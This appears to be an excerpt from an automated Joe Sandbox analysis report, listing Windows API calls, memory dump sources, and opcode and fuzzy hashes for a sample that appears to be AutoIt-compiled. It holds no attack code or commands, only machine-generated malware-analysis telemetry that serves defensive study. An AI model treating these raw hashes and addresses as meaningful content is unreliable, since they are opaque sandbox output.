                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2880819207-0
                                                                                                                                                        APIs
                                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AAC657
                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00AAC66B
                                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00AAC675
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3970641297-0
                                                                                                                                                        APIs
                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00AD49EE
                                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 00AD4A13
                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00AD4A1D
                                                                                                                                                        • Sleep.KERNEL32(?), ref: 00AD4A50
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CounterPerformanceQuerySleep
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2875609808-0
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3016257755-0
                                                                                                                                                        • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                                        • Instruction ID: 5a298768dd01d6d5aa6baef9219668fd4f0b1840d49f09c394f080420d782c13
                                                                                                                                                        • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                                        • Instruction Fuzzy Hash: AA018C3280464EBBCF125F94DD41DEE3F62BF18350B5A8818FE2859031D232DAB1AB81
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AB869D: __getptd_noexit.LIBCMT ref: 00AB869E
                                                                                                                                                        • __lock.LIBCMT ref: 00AB811F
                                                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00AB813C
                                                                                                                                                        • _free.LIBCMT ref: 00AB814F
                                                                                                                                                        • InterlockedIncrement.KERNEL32(00DA2408), ref: 00AB8167
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2704283638-0
                                                                                                                                                        • Opcode ID: 910b2c90fc9d8a8876855a3edd1aeb34c53be0121e53a17c76830d72034f0328
                                                                                                                                                        • Instruction ID: 6f64956d71005e35df8e1536d6f6cd76188472f656fa71ccf4583f5c4addfa20
                                                                                                                                                        • Opcode Fuzzy Hash: 910b2c90fc9d8a8876855a3edd1aeb34c53be0121e53a17c76830d72034f0328
                                                                                                                                                        • Instruction Fuzzy Hash: BB01D232942621ABDB11AF6CA94A7DD73BCBF05710F040209F41067293DF389A42DBD6
                                                                                                                                                        APIs
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00AFDE07
                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00AFDE1F
                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00AFDE43
                                                                                                                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 00AFDE5E
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 357397906-0
                                                                                                                                                        • Opcode ID: a805eca5e8478d444cc78572342309663ab75e1917712fceaff94c1c083ae4b3
                                                                                                                                                        • Instruction ID: 2bf1f4dce0ecf34be92a3cecd4583d36d35a029955a96178d0cacec0216e4ace
                                                                                                                                                        • Opcode Fuzzy Hash: a805eca5e8478d444cc78572342309663ab75e1917712fceaff94c1c083ae4b3
                                                                                                                                                        • Instruction Fuzzy Hash: E9112DB9D00209EFDB41DFA9C8849EEBBF9FB08310F508166E925E3214DB35AA55CF50
                                                                                                                                                        APIs
                                                                                                                                                        • __lock.LIBCMT ref: 00AB8768
                                                                                                                                                          • Part of subcall function 00AB8984: __mtinitlocknum.LIBCMT ref: 00AB8996
                                                                                                                                                          • Part of subcall function 00AB8984: RtlEnterCriticalSection.NTDLL(00AB0127), ref: 00AB89AF
                                                                                                                                                        • InterlockedIncrement.KERNEL32(DC840F00), ref: 00AB8775
                                                                                                                                                        • __lock.LIBCMT ref: 00AB8789
                                                                                                                                                        • ___addlocaleref.LIBCMT ref: 00AB87A7
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1687444384-0
                                                                                                                                                        • Opcode ID: 0b920dbacdc0afd447cb745efbd9d65f9893a87499132f4637bddff2ed2279f6
                                                                                                                                                        • Instruction ID: 5c6e0d6e0a578f4f6a2fa8be79b1cc12f1d3423108042058b74cf60ee96361d6
                                                                                                                                                        • Opcode Fuzzy Hash: 0b920dbacdc0afd447cb745efbd9d65f9893a87499132f4637bddff2ed2279f6
                                                                                                                                                        • Instruction Fuzzy Hash: 0C016D72440B00AFD760EF69D905799F7F8FF40325F20890EE4A9872A2CFB4A680CB01
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00AFE14D
                                                                                                                                                        • _memset.LIBCMT ref: 00AFE15C
                                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00B53EE0,00B53F24), ref: 00AFE18B
                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00AFE19D
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3277943733-0
                                                                                                                                                        • Opcode ID: 7f6d5ac1f86551135a549879648d1822c74cae2c62fc01103384eabce86671a7
                                                                                                                                                        • Instruction ID: 720d9048e14cddf1b3ced5491bbadfeb4c58f0b468035663f59de101dcbd9ca3
                                                                                                                                                        • Opcode Fuzzy Hash: 7f6d5ac1f86551135a549879648d1822c74cae2c62fc01103384eabce86671a7
                                                                                                                                                        • Instruction Fuzzy Hash: 26F05EF1940314BFF2105B65AC56FB77AECDB09BD6F404460FE04D62A2DBB68E1096B8
                                                                                                                                                        APIs
                                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00AD9C7F
                                                                                                                                                          • Part of subcall function 00ADAD14: _memset.LIBCMT ref: 00ADAD49
                                                                                                                                                        • _memmove.LIBCMT ref: 00AD9CA2
                                                                                                                                                        • _memset.LIBCMT ref: 00AD9CAF
                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00AD9CBF
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 48991266-0
                                                                                                                                                        • Opcode ID: c4603c70a9e18edd7bbd82f8f9a3dfa93134dd2a64f10b2c107709de549019a4
                                                                                                                                                        • Instruction ID: 5987653c77608abc8222b898d6cff4e509a9cec37b9c7f56ed93f1ce77e675bb
                                                                                                                                                        • Opcode Fuzzy Hash: c4603c70a9e18edd7bbd82f8f9a3dfa93134dd2a64f10b2c107709de549019a4
                                                                                                                                                        • Instruction Fuzzy Hash: 26F03A7A200000AFCB016F54EC85A8ABB69EF45360B48C062FE099F217CB31E911DBB5
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00AAB5EB
                                                                                                                                                          • Part of subcall function 00AAB58B: SelectObject.GDI32(?,00000000), ref: 00AAB5FA
                                                                                                                                                          • Part of subcall function 00AAB58B: BeginPath.GDI32(?), ref: 00AAB611
                                                                                                                                                          • Part of subcall function 00AAB58B: SelectObject.GDI32(?,00000000), ref: 00AAB63B
                                                                                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00AFE860
                                                                                                                                                        • LineTo.GDI32(00000000,?,?), ref: 00AFE86D
                                                                                                                                                        • EndPath.GDI32(00000000), ref: 00AFE87D
                                                                                                                                                        • StrokePath.GDI32(00000000), ref: 00AFE88B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1539411459-0
                                                                                                                                                        • Opcode ID: 52f6c97f9a504e64f93cd04d545189185239c114e7bcdeeaeb3794678c8ac0ff
                                                                                                                                                        • Instruction ID: 88d76814d27a50def49ceb76c25ff75634059add615cc06fc72a55cd73476de2
                                                                                                                                                        • Opcode Fuzzy Hash: 52f6c97f9a504e64f93cd04d545189185239c114e7bcdeeaeb3794678c8ac0ff
                                                                                                                                                        • Instruction Fuzzy Hash: C4F05E31001259BBDB126F94AC0DFDE3F99AF0A311F448141FA11660E1CB795661DFE5
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ACD640
                                                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00ACD653
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00ACD65A
                                                                                                                                                        • AttachThreadInput.USER32(00000000), ref: 00ACD661
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2710830443-0
                                                                                                                                                        • Opcode ID: b523d696d34217a22061f9aa291002995b66b15f7efab47e338773a8d9e3ae1b
                                                                                                                                                        • Instruction ID: 485ece6d42f1f6f3df12c0afd2bed2512d24656aa7a08705c3329781bc43afdd
                                                                                                                                                        • Opcode Fuzzy Hash: b523d696d34217a22061f9aa291002995b66b15f7efab47e338773a8d9e3ae1b
                                                                                                                                                        • Instruction Fuzzy Hash: F4E0C971541228BADB215FA29C0DFDB7F6CEF567A1F808025BA0D96060DF759590CBA0
                                                                                                                                                        APIs
                                                                                                                                                        • GetSysColor.USER32(00000008), ref: 00AAB0C5
                                                                                                                                                        • SetTextColor.GDI32(?,000000FF), ref: 00AAB0CF
                                                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00AAB0E4
                                                                                                                                                        • GetStockObject.GDI32(00000005), ref: 00AAB0EC
                                                                                                                                                        • GetWindowDC.USER32(?,00000000), ref: 00B0ECFA
                                                                                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B0ED07
                                                                                                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 00B0ED20
                                                                                                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 00B0ED39
                                                                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00B0ED59
                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00B0ED64
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1946975507-0
                                                                                                                                                        • Opcode ID: 0112e45d84ee05934ac1ae0a8bc1bbe55cedf0fa08762686c1131e7625071da1
                                                                                                                                                        • Instruction ID: 3c40fd757340a1295701f1395ef0eb55a5514f532a0f6389c054ce41c737104d
                                                                                                                                                        • Opcode Fuzzy Hash: 0112e45d84ee05934ac1ae0a8bc1bbe55cedf0fa08762686c1131e7625071da1
                                                                                                                                                        • Instruction Fuzzy Hash: E1E0ED31500240BEEB215F74AC497D87F61EB56335F54C366F779690E2CB728590DB11
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2889604237-0
                                                                                                                                                        • Opcode ID: 5aee4246f0e310978ef32db625cdaf9c503f8980b525f541665b55c6c9d2011b
                                                                                                                                                        • Instruction ID: a8506b95f566c5c8715c47eacf0d1418c8a7ccd072f55f08fe74fead2a896708
                                                                                                                                                        • Opcode Fuzzy Hash: 5aee4246f0e310978ef32db625cdaf9c503f8980b525f541665b55c6c9d2011b
                                                                                                                                                        • Instruction Fuzzy Hash: AFE092B5540204EFDB009F709888AA97FE9EB4C361F51C816F94A8B291EFB999819B50
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2889604237-0
                                                                                                                                                        • Opcode ID: 6539d460f653930ba4a5f0478903f644191ef9b74096f53a3cfef466a717e8ef
                                                                                                                                                        • Instruction ID: d130eb19fe022b0d8f1e3afac55dcab2b4d2d0925db8b24ddb508c3bf435e453
                                                                                                                                                        • Opcode Fuzzy Hash: 6539d460f653930ba4a5f0478903f644191ef9b74096f53a3cfef466a717e8ef
                                                                                                                                                        • Instruction Fuzzy Hash: 1DE0B6B5940304EFDB009F70DC4C6A97BE9EB4C361F51C815F94ACB251DFB999818B50
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memmove
                                                                                                                                                        • String ID: >$DEFINE
                                                                                                                                                        • API String ID: 4104443479-1664449232
                                                                                                                                                        • Opcode ID: 45ac7d665f12590a176ef06c1a2f40bdc064eced800e7bb99adadd18ee082041
                                                                                                                                                        • Instruction ID: 806c7863620b6bb0501ec060b98ac1946c11f3725342597ee90c7a9ebaf1b32c
                                                                                                                                                        • Opcode Fuzzy Hash: 45ac7d665f12590a176ef06c1a2f40bdc064eced800e7bb99adadd18ee082041
                                                                                                                                                        • Instruction Fuzzy Hash: 25124875A0021ADFCF24CF58C490AEDB7F1FF48310F65819AE859AB355E734A991CB90
                                                                                                                                                        APIs
                                                                                                                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 00ACECA0
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ContainedObject
                                                                                                                                                        • String ID: AutoIt3GUI$Container
                                                                                                                                                        • API String ID: 3565006973-3941886329
                                                                                                                                                        • Opcode ID: 4120616445fd6d3c2750d464588300e099a9b15bbf340774d726250d4335f020
                                                                                                                                                        • Instruction ID: 6781de62abc386363d3392d34e65fc051c3efa0396bcacc9f8271a49525883d6
                                                                                                                                                        • Opcode Fuzzy Hash: 4120616445fd6d3c2750d464588300e099a9b15bbf340774d726250d4335f020
                                                                                                                                                        • Instruction Fuzzy Hash: 7A911774600701AFDB14DF68C884F6ABBF9BF49710B1585ADF94ACB291EB70E941CB60
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A93BCF: _wcscpy.LIBCMT ref: 00A93BF2
                                                                                                                                                          • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                                                                                                                                                          • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                                                                                                                                                        • __wcsnicmp.LIBCMT ref: 00ADE785
                                                                                                                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00ADE84E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                                        • String ID: LPT
                                                                                                                                                        • API String ID: 3222508074-1350329615
                                                                                                                                                        • Opcode ID: 10095fac5129e515c59aa465d274441b007dbe14a6a7ad91ba058689cbc1c6fd
                                                                                                                                                        • Instruction ID: 1e825b852a1c720edc78d58f464aba1814e9f162bcdb6597e63e0388263f83ec
                                                                                                                                                        • Opcode Fuzzy Hash: 10095fac5129e515c59aa465d274441b007dbe14a6a7ad91ba058689cbc1c6fd
                                                                                                                                                        • Instruction Fuzzy Hash: 19615E75A00215AFDB14EB98C995EAEB7F8EF49310F04406AF546AF391DB70AE80DB50
                                                                                                                                                        APIs
                                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 00A91B83
                                                                                                                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00A91B9C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                                                                                        • String ID: @
                                                                                                                                                        • API String ID: 2783356886-2766056989
                                                                                                                                                        • Opcode ID: 5dfb1cc48c84806ade90af1929c8595776bc9b2bd76d4aaaf7d11e3d3afeffd9
                                                                                                                                                        • Instruction ID: dced035544eadd9dd1f1afa8b9a494879275d2d1cf3c807f944d28f71384851c
                                                                                                                                                        • Opcode Fuzzy Hash: 5dfb1cc48c84806ade90af1929c8595776bc9b2bd76d4aaaf7d11e3d3afeffd9
                                                                                                                                                        • Instruction Fuzzy Hash: 94514871408745ABE720AF14D885BABBBE8FB9A354F81484DF1C8420A1EF75996C8763
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A9417D: __fread_nolock.LIBCMT ref: 00A9419B
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00ADCF49
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00ADCF5C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcscmp$__fread_nolock
                                                                                                                                                        • String ID: FILE
                                                                                                                                                        • API String ID: 4029003684-3121273764
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00AFA668
                                                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00AFA67D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend
                                                                                                                                                        • String ID: '
                                                                                                                                                        • API String ID: 3850602802-1997036262
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00AE57E7
                                                                                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00AE581D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
